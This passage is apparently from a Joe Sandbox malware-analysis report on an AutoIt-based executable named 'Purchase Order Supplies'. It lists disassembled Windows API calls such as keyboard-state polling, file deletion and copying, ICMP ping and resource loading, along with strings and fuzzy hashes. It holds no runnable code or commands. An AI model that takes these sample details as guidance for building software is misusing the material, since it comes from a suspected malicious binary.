                          • FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 00CD810E
                          • SetActiveWindow.USER32 ref: 00CD812D
                          • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00CD813B
                          • SendMessageW.USER32(00000010,00000000,00000000), ref: 00CD815A
                          • Sleep.KERNEL32(000000FA), ref: 00CD8165
                          • IsWindow.USER32 ref: 00CD8171
                          • EndDialog.USER32(00000000), ref: 00CD8182
                          Strings
                          Similarity
                          • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                          • String ID: BUTTON
                          • API String ID: 1194449130-3405671355
                          • Opcode ID: e1e2b50bb142d905d432a8f610c3752060ad8f253f79d17eceef71bef6968298
                          • Instruction ID: 3b2551b8547df8bd93b1baa3874047ac561c7adc128c170dc189ec9c2419cf44
                          • Opcode Fuzzy Hash: e1e2b50bb142d905d432a8f610c3752060ad8f253f79d17eceef71bef6968298
                          • Instruction Fuzzy Hash: 17218E70240305BFE7225B62EC89A7A7B6BF7153CAB444116FA11C23A1CF725E0EA731
                          APIs
                          • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00D03C64,00000010,00000000,Bad directive syntax error,00D2DBF0,00000000,?,00000000,?,>>>AUTOIT SCRIPT<<<), ref: 00CD32D1
                          • LoadStringW.USER32(00000000,?,00D03C64,00000010), ref: 00CD32D8
                            • Part of subcall function 00C9CAEE: _memmove.LIBCMT ref: 00C9CB2F
                          • _wprintf.LIBCMT ref: 00CD3309
                          • __swprintf.LIBCMT ref: 00CD332B
                          • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00CD3395
                          Strings
                          Similarity
                          • API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
                          • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                          • API String ID: 1506413516-4153970271
                          • Opcode ID: 3edec60969c5084e47f8d552e6aae474b78159304bdb70a14f75706d31623bf2
                          • Instruction ID: ba3d26cf17e037bb5cf4cff52569ff42ef0358834db06aca8a411d17d93869d7
                          • Opcode Fuzzy Hash: 3edec60969c5084e47f8d552e6aae474b78159304bdb70a14f75706d31623bf2
                          • Instruction Fuzzy Hash: 72213B31840259BBDF12AF90CC4AEEE7779BF28700F004456F515A10A1EB75AA58EB61
                          APIs
                            • Part of subcall function 00CDC6A0: __time64.LIBCMT ref: 00CDC6AA
                            • Part of subcall function 00C941A7: _fseek.LIBCMT ref: 00C941BF
                          • __wsplitpath.LIBCMT ref: 00CDC96F
                            • Part of subcall function 00CB297D: __wsplitpath_helper.LIBCMT ref: 00CB29BD
                          • _wcscpy.LIBCMT ref: 00CDC982
                          • _wcscat.LIBCMT ref: 00CDC995
                          • __wsplitpath.LIBCMT ref: 00CDC9BA
                          • _wcscat.LIBCMT ref: 00CDC9D0
                          • _wcscat.LIBCMT ref: 00CDC9E3
                            • Part of subcall function 00CDC6E4: _memmove.LIBCMT ref: 00CDC71D
                            • Part of subcall function 00CDC6E4: _memmove.LIBCMT ref: 00CDC72C
                          • _wcscmp.LIBCMT ref: 00CDC92A
                            • Part of subcall function 00CDCE59: _wcscmp.LIBCMT ref: 00CDCF49
                            • Part of subcall function 00CDCE59: _wcscmp.LIBCMT ref: 00CDCF5C
                          • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00CDCB8D
                          • DeleteFileW.KERNEL32(?,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00CDCC24
                          • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00CDCC3A
                          • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00CDCC4B
                          • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00CDCC5D
                          Similarity
                          • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy
                          • String ID:
                          • API String ID: 152968663-0
                          • Opcode ID: 85a629b5e04ae786607e0e36a796208aa087ce1780be1ac849e519ea8ceec392
                          • Instruction ID: 99a998cd9908eabfb62a6de070f8cfa2c157a2694fddb7382d9284cb972d4626
                          • Opcode Fuzzy Hash: 85a629b5e04ae786607e0e36a796208aa087ce1780be1ac849e519ea8ceec392
                          • Instruction Fuzzy Hash: 61C12BB1D00229AECF14DF95CC81EDEBBBDAF59310F0040AAF609E6251DB709A85DF65
                          APIs
                          Similarity
                          • API ID: _wcscpy$FolderUninitialize_memset$BrowseDesktopFromInitializeListMallocPath
                          • String ID:
                          • API String ID: 3566271842-0
                          • Opcode ID: d3be6798917c3a6f387e3faf73bb2decb86f959495c0cc50fc3fe5d94ebf38b8
                          • Instruction ID: 167ccf2a2c9578b9f649b3280b3f1743b17434555b9454b9bc776aa9efe0203f
                          • Opcode Fuzzy Hash: d3be6798917c3a6f387e3faf73bb2decb86f959495c0cc50fc3fe5d94ebf38b8
                          • Instruction Fuzzy Hash: EC713D75A00219AFDB10DFA5C888ADEB7B9EF48310F148095E919EB251DB74EE41DF90
                          APIs
                          • GetKeyboardState.USER32(?), ref: 00CD3908
                          • SetKeyboardState.USER32(?), ref: 00CD3973
                          • GetAsyncKeyState.USER32(000000A0), ref: 00CD3993
                          • GetKeyState.USER32(000000A0), ref: 00CD39AA
                          • GetAsyncKeyState.USER32(000000A1), ref: 00CD39D9
                          • GetKeyState.USER32(000000A1), ref: 00CD39EA
                          • GetAsyncKeyState.USER32(00000011), ref: 00CD3A16
                          • GetKeyState.USER32(00000011), ref: 00CD3A24
                          • GetAsyncKeyState.USER32(00000012), ref: 00CD3A4D
                          • GetKeyState.USER32(00000012), ref: 00CD3A5B
                          • GetAsyncKeyState.USER32(0000005B), ref: 00CD3A84
                          • GetKeyState.USER32(0000005B), ref: 00CD3A92
                          Similarity
                          • API ID: State$Async$Keyboard
                          • String ID:
                          • API String ID: 541375521-0
                          • Opcode ID: 333edd8cab11202d018ce34825fe97a708ab51d5b527648fc1f0bac17387e94a
                          • Instruction ID: 9904efdffd3a9b88f60eedcad46c87b67119cea272cc9dd59cc0607f1ab3d982
                          • Opcode Fuzzy Hash: 333edd8cab11202d018ce34825fe97a708ab51d5b527648fc1f0bac17387e94a
                          • Instruction Fuzzy Hash: A1518420A047C469FB35EBA488117AABBB45F01340F08859FD7D65A3C2DB649B8CD767
                          APIs
                          • GetDlgItem.USER32(?,00000001), ref: 00CCFB19
                          • GetWindowRect.USER32(00000000,?), ref: 00CCFB2B
                          • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00CCFB89
                          • GetDlgItem.USER32(?,00000002), ref: 00CCFB94
                          • GetWindowRect.USER32(00000000,?), ref: 00CCFBA6
                          • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00CCFBFC
                          • GetDlgItem.USER32(?,000003E9), ref: 00CCFC0A
                          • GetWindowRect.USER32(00000000,?), ref: 00CCFC1B
                          • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00CCFC5E
                          • GetDlgItem.USER32(?,000003EA), ref: 00CCFC6C
                          • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00CCFC89
                          • InvalidateRect.USER32(?,00000000,00000001), ref: 00CCFC96
                          Similarity
                          • API ID: Window$ItemMoveRect$Invalidate
                          • String ID:
                          • API String ID: 3096461208-0
                          • Opcode ID: 2632b348b7fea85a6483cbe90bf9c53321bb488bbd919db8e88cd9af7d9c0375
                          • Instruction ID: 23a800348e1e66f3f6561081213eaf7a911b264e05981365ad221096c3afd921
                          • Opcode Fuzzy Hash: 2632b348b7fea85a6483cbe90bf9c53321bb488bbd919db8e88cd9af7d9c0375
                          • Instruction Fuzzy Hash: 5551FE71B00209BFDB18CF69DD95FAEBBBAEB88710F14812DF915D6290DB709E018B10
                          APIs
                            • Part of subcall function 00CAB155: GetWindowLongW.USER32(?,000000EB), ref: 00CAB166
                          • GetSysColor.USER32(0000000F), ref: 00CAB067
                          Similarity
                          • API ID: ColorLongWindow
                          • String ID:
                          • API String ID: 259745315-0
                          • Opcode ID: 18c1c51edddf25e2aa0c8f228f057f05ff6fb5ed579f366de81fa84583295449
                          • Instruction ID: bd8ac3567dc589ffc2a1f1773d6c2b0eb7ff907e5984c176f929e96d8a77b249
                          • Opcode Fuzzy Hash: 18c1c51edddf25e2aa0c8f228f057f05ff6fb5ed579f366de81fa84583295449
                          • Instruction Fuzzy Hash: 1941A371100611BFDB205F38D848BBA3B66AB07725F184265FE758E2E6D7318D42DB31
                          APIs
                          Similarity
                          • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                          • String ID:
                          • API String ID: 136442275-0
                          • Opcode ID: 8d73edbc77d14679d1d88fca0cbd14743c16a15ee55b8fa696e1b32f754b9a79
                          • Instruction ID: a7df740ed8c9674faeca3d0d7bd27b643b82e712d6bd7401dcacddfb854b5d72
                          • Opcode Fuzzy Hash: 8d73edbc77d14679d1d88fca0cbd14743c16a15ee55b8fa696e1b32f754b9a79
                          • Instruction Fuzzy Hash: 36411FB280416CAADB21EB50DC51EDE73BCAB08310F5441E7FA19A3151EB31ABD4DFA0
                          APIs
                          • __swprintf.LIBCMT ref: 00C984E5
                          • __itow.LIBCMT ref: 00C98519
                            • Part of subcall function 00CB2177: _xtow@16.LIBCMT ref: 00CB2198
                          Strings
                          Similarity
                          • API ID: __itow__swprintf_xtow@16
                          • String ID: %.15g$0x%p$False$True
                          • API String ID: 1502193981-2263619337
                          • Opcode ID: 0852375887fbafd2d251570d89efb2dd072fd8daca6affa4ab3620b1db0b02e1
                          • Instruction ID: 5ed5df5ec9517e3b180257ff1e45a7e8265429329ff1be756d3da276d9e894c2
                          • Opcode Fuzzy Hash: 0852375887fbafd2d251570d89efb2dd072fd8daca6affa4ab3620b1db0b02e1
                          • Instruction Fuzzy Hash: 6F41F3716006059BEF24DF38EC45FAA73E9BF45300F24446AE94AD7196EA31DA45EB20
                          APIs
                          • _memset.LIBCMT ref: 00CB5CCA
                            • Part of subcall function 00CB889E: __getptd_noexit.LIBCMT ref: 00CB889E
                          • __gmtime64_s.LIBCMT ref: 00CB5D63
                          • __gmtime64_s.LIBCMT ref: 00CB5D99
                          • __gmtime64_s.LIBCMT ref: 00CB5DB6
                          • __allrem.LIBCMT ref: 00CB5E0C
                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00CB5E28
                          • __allrem.LIBCMT ref: 00CB5E3F
                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00CB5E5D
                          • __allrem.LIBCMT ref: 00CB5E74
                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00CB5E92
                          • __invoke_watson.LIBCMT ref: 00CB5F03
                          Similarity
                          • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                          • String ID:
                          • API String ID: 384356119-0
                          • Opcode ID: 44019df33dda40162e7ad5693cac5fdd13db5b94ac58de4e6029986730a9c23d
                          • Instruction ID: 2bc45540cf5f28ce4bc9ec82a2b461ada273ed7b3db7c62daed1101d6c862e84
                          • Opcode Fuzzy Hash: 44019df33dda40162e7ad5693cac5fdd13db5b94ac58de4e6029986730a9c23d
                          • Instruction Fuzzy Hash: 4771F871E01B16ABE714AF78CC81BEAB7B9AF14724F144229F910E7681E774DF409B90
                          APIs
                          • _memset.LIBCMT ref: 00CD5816
                          • GetMenuItemInfoW.USER32(00D518F0,000000FF,00000000,00000030), ref: 00CD5877
                          • SetMenuItemInfoW.USER32(00D518F0,00000004,00000000,00000030), ref: 00CD58AD
                          • Sleep.KERNEL32(000001F4), ref: 00CD58BF
                          • GetMenuItemCount.USER32(?), ref: 00CD5903
                          • GetMenuItemID.USER32(?,00000000), ref: 00CD591F
                          • GetMenuItemID.USER32(?,-00000001), ref: 00CD5949
                          • GetMenuItemID.USER32(?,?), ref: 00CD598E
                          • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00CD59D4
                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00CD59E8
                          • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00CD5A09
                          Similarity
                          • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                          • String ID:
                          • API String ID: 4176008265-0
                          • Opcode ID: 2c22effc3a83e69838c2050894f52c1556757b2f526fe40bba1d716c5fef2b3a
                          • Instruction ID: 47e5509ea2bf8b3d84a4bc528a78dcdd03e0473e51d1da6d29650d2c6263d9fc
                          • Opcode Fuzzy Hash: 2c22effc3a83e69838c2050894f52c1556757b2f526fe40bba1d716c5fef2b3a
                          • Instruction Fuzzy Hash: C561AE70900759EFDB10CFA4C898EBE7BBAEB01318F14411AEA51E7391D731AE02DB20
                          APIs
                          • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00CF9AA5
                          • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00CF9AA8
                          • GetWindowLongW.USER32(?,000000F0), ref: 00CF9ACC
                          • _memset.LIBCMT ref: 00CF9ADD
                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00CF9AEF
                          • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00CF9B67
                          Similarity
                          • API ID: MessageSend$LongWindow_memset
                          • String ID:
                          • API String ID: 830647256-0
                          • Opcode ID: 8d37d1aea0bfc88f6b616c085c0add83889d4f34f60edd5df20ec2795160670b
                          • Instruction ID: c1a9f32c52e7dd021f4ed9ea93c3614b5af20006ee40c64ae03bc6a702ffb50e
                          • Opcode Fuzzy Hash: 8d37d1aea0bfc88f6b616c085c0add83889d4f34f60edd5df20ec2795160670b
                          • Instruction Fuzzy Hash: DD612A75900208AFDB21DFA8CC81FEE7BB8EB09710F144159FA15E72A1D770AE45DB61
                          APIs
                          • GetKeyboardState.USER32(?), ref: 00CD3591
                          • GetAsyncKeyState.USER32(000000A0), ref: 00CD3612
                          • GetKeyState.USER32(000000A0), ref: 00CD362D
                          • GetAsyncKeyState.USER32(000000A1), ref: 00CD3647
                          • GetKeyState.USER32(000000A1), ref: 00CD365C
                          • GetAsyncKeyState.USER32(00000011), ref: 00CD3674
                          • GetKeyState.USER32(00000011), ref: 00CD3686
                          • GetAsyncKeyState.USER32(00000012), ref: 00CD369E
                          • GetKeyState.USER32(00000012), ref: 00CD36B0
                          • GetAsyncKeyState.USER32(0000005B), ref: 00CD36C8
                          • GetKeyState.USER32(0000005B), ref: 00CD36DA
                          Similarity
                          • API ID: State$Async$Keyboard
                          • String ID:
                          • API String ID: 541375521-0
                          • Opcode ID: 2b67580bd95ad15c189a6659bc821691a0208f0150c77263af14532de6b1b767
                          • Instruction ID: 47ad268e540b4d8ef8c84d48dc100817ba90c2dedf7f51e607ee8e6cbde48519
                          • Opcode Fuzzy Hash: 2b67580bd95ad15c189a6659bc821691a0208f0150c77263af14532de6b1b767
                          • Instruction Fuzzy Hash: 3E418260508BC97DFF319B6498143A5BEA17B12344F08805BE7D6563C2EBA4DBC9CB63
                          APIs
                          • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,?), ref: 00CCA2AA
                          • SafeArrayAllocData.OLEAUT32(?), ref: 00CCA2F5
                          • VariantInit.OLEAUT32(?), ref: 00CCA307
                          • SafeArrayAccessData.OLEAUT32(?,?), ref: 00CCA327
                          • VariantCopy.OLEAUT32(?,?), ref: 00CCA36A
                          • SafeArrayUnaccessData.OLEAUT32(?), ref: 00CCA37E
                          • VariantClear.OLEAUT32(?), ref: 00CCA393
                          • SafeArrayDestroyData.OLEAUT32(?), ref: 00CCA3A0
                          • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00CCA3A9
                          • VariantClear.OLEAUT32(?), ref: 00CCA3BB
                          • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00CCA3C6
                          Similarity
                          • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                          • String ID:
                          • API String ID: 2706829360-0
                          • Opcode ID: 8c493eecbeabaf2cec7861325dfcdc8c0ac20879f5453d60ce92e8a7d07cc94b
                          • Instruction ID: cec201f961e6c6ded2c0d96b928649f50c2e6e60c3b4a67f09cd928340f10d0b
                          • Opcode Fuzzy Hash: 8c493eecbeabaf2cec7861325dfcdc8c0ac20879f5453d60ce92e8a7d07cc94b
                          • Instruction Fuzzy Hash: F8411B71900219ABDB01DFA4D888DDEBBB9FF48308F108069E555E7261DB34AA46DBA1
                          APIs
                            • Part of subcall function 00C984A6: __swprintf.LIBCMT ref: 00C984E5
                            • Part of subcall function 00C984A6: __itow.LIBCMT ref: 00C98519
                          • CoInitialize.OLE32 ref: 00CEB298
                          • CoUninitialize.COMBASE ref: 00CEB2A3
                          • CoCreateInstance.COMBASE(?,00000000,00000017,00D1D8FC,?), ref: 00CEB303
                          • IIDFromString.COMBASE(?,?), ref: 00CEB376
                          • VariantInit.OLEAUT32(?), ref: 00CEB410
                          • VariantClear.OLEAUT32(?), ref: 00CEB471
                          Strings
                          Similarity
                          • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                          • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                          • API String ID: 834269672-1287834457
                          • Opcode ID: 688084189d7acec1c052117e915260c2d5f1122e54db9111ac76af2fb621a78a
                          • Instruction ID: 5e07280e3df99e63b627f5224d1c3a120ca7d94f4e08aa50de954413c55bc839
                          • Opcode Fuzzy Hash: 688084189d7acec1c052117e915260c2d5f1122e54db9111ac76af2fb621a78a
                          • Instruction Fuzzy Hash: D9619D71204341AFC710DF56C889B6FB7E8AF89714F10481DFA959B2A1DB70EE49CB92
                          APIs
                          • WSAStartup.WS2_32(00000101,?), ref: 00CE86F5
                          • inet_addr.WS2_32(?), ref: 00CE873A
                          • gethostbyname.WS2_32(?), ref: 00CE8746
                          • IcmpCreateFile.IPHLPAPI ref: 00CE8754
                          • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00CE87C4
                          • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00CE87DA
                          • IcmpCloseHandle.IPHLPAPI(00000000), ref: 00CE884F
                          • WSACleanup.WS2_32 ref: 00CE8855
                          Strings
                          Similarity
                          • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                          • String ID: Ping
                          • API String ID: 1028309954-2246546115
                          APIs
                          • SetErrorMode.KERNEL32(00000001), ref: 00CDEC1E
                          • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00CDEC94
                          • GetLastError.KERNEL32 ref: 00CDEC9E
                          • SetErrorMode.KERNEL32(00000000,READY), ref: 00CDED0B
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: Error$Mode$DiskFreeLastSpace
                          • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                          • API String ID: 4194297153-14809454
                          APIs
                            • Part of subcall function 00C9CAEE: _memmove.LIBCMT ref: 00C9CB2F
                          • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00CCC782
                          • GetDlgCtrlID.USER32 ref: 00CCC78D
                          • GetParent.USER32 ref: 00CCC7A9
                          • SendMessageW.USER32(00000000,?,00000111,?), ref: 00CCC7AC
                          • GetDlgCtrlID.USER32(?), ref: 00CCC7B5
                          • GetParent.USER32(?), ref: 00CCC7D1
                          • SendMessageW.USER32(00000000,?,?,00000111), ref: 00CCC7D4
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: MessageSend$CtrlParent$_memmove
                          • String ID: ComboBox$ListBox
                          • API String ID: 313823418-1403004172
                          APIs
                            • Part of subcall function 00C9CAEE: _memmove.LIBCMT ref: 00C9CB2F
                          • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00CCC869
                          • GetDlgCtrlID.USER32 ref: 00CCC874
                          • GetParent.USER32 ref: 00CCC890
                          • SendMessageW.USER32(00000000,?,00000111,?), ref: 00CCC893
                          • GetDlgCtrlID.USER32(?), ref: 00CCC89C
                          • GetParent.USER32(?), ref: 00CCC8B8
                          • SendMessageW.USER32(00000000,?,?,00000111), ref: 00CCC8BB
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: MessageSend$CtrlParent$_memmove
                          • String ID: ComboBox$ListBox
                          • API String ID: 313823418-1403004172
                          APIs
                          • GetParent.USER32 ref: 00CCC8D9
                          • GetClassNameW.USER32(00000000,?,00000100), ref: 00CCC8EE
                          • _wcscmp.LIBCMT ref: 00CCC900
                          • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00CCC97B
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: ClassMessageNameParentSend_wcscmp
                          • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                          • API String ID: 1704125052-3381328864
                          APIs
                          • SafeArrayGetVartype.OLEAUT32(?,00000000), ref: 00CDB137
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: ArraySafeVartype
                          • String ID:
                          • API String ID: 1725837607-0
                          APIs
                          • __lock.LIBCMT ref: 00CBBA74
                            • Part of subcall function 00CB8984: __mtinitlocknum.LIBCMT ref: 00CB8996
                            • Part of subcall function 00CB8984: RtlEnterCriticalSection.NTDLL(00CB0127), ref: 00CB89AF
                          • __calloc_crt.LIBCMT ref: 00CBBA85
                            • Part of subcall function 00CB7616: __calloc_impl.LIBCMT ref: 00CB7625
                            • Part of subcall function 00CB7616: Sleep.KERNEL32(00000000,?,00CB0127,?,00C9125D,00000058,?,?), ref: 00CB763C
                          • @_EH4_CallFilterFunc@8.LIBCMT ref: 00CBBAA0
                          • GetStartupInfoW.KERNEL32(?,00D46990,00000064,00CB6B14,00D467D8,00000014), ref: 00CBBAF9
                          • __calloc_crt.LIBCMT ref: 00CBBB44
                          • GetFileType.KERNEL32(00000001), ref: 00CBBB8B
                          • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 00CBBBC4
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: CriticalSection__calloc_crt$CallCountEnterFileFilterFunc@8InfoInitializeSleepSpinStartupType__calloc_impl__lock__mtinitlocknum
                          • String ID:
                          • API String ID: 1426640281-0
                          APIs
                          • __swprintf.LIBCMT ref: 00CD7226
                          • __swprintf.LIBCMT ref: 00CD7233
                            • Part of subcall function 00CB234B: __woutput_l.LIBCMT ref: 00CB23A4
                          • FindResourceW.KERNEL32(?,?,0000000E), ref: 00CD725D
                          • LoadResource.KERNEL32(?,00000000), ref: 00CD7269
                          • LockResource.KERNEL32(00000000), ref: 00CD7276
                          • FindResourceW.KERNEL32(?,?,00000003), ref: 00CD7296
                          • LoadResource.KERNEL32(?,00000000), ref: 00CD72A8
                          • SizeofResource.KERNEL32(?,00000000), ref: 00CD72B7
                          • LockResource.KERNEL32(?), ref: 00CD72C3
                          • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 00CD7322
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                          • String ID:
                          • API String ID: 1433390588-0
                          APIs
                          • GetCurrentThreadId.KERNEL32 ref: 00CD4A7D
                          • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00CD3AD7,?,00000001), ref: 00CD4A91
                          • GetWindowThreadProcessId.USER32(00000000), ref: 00CD4A98
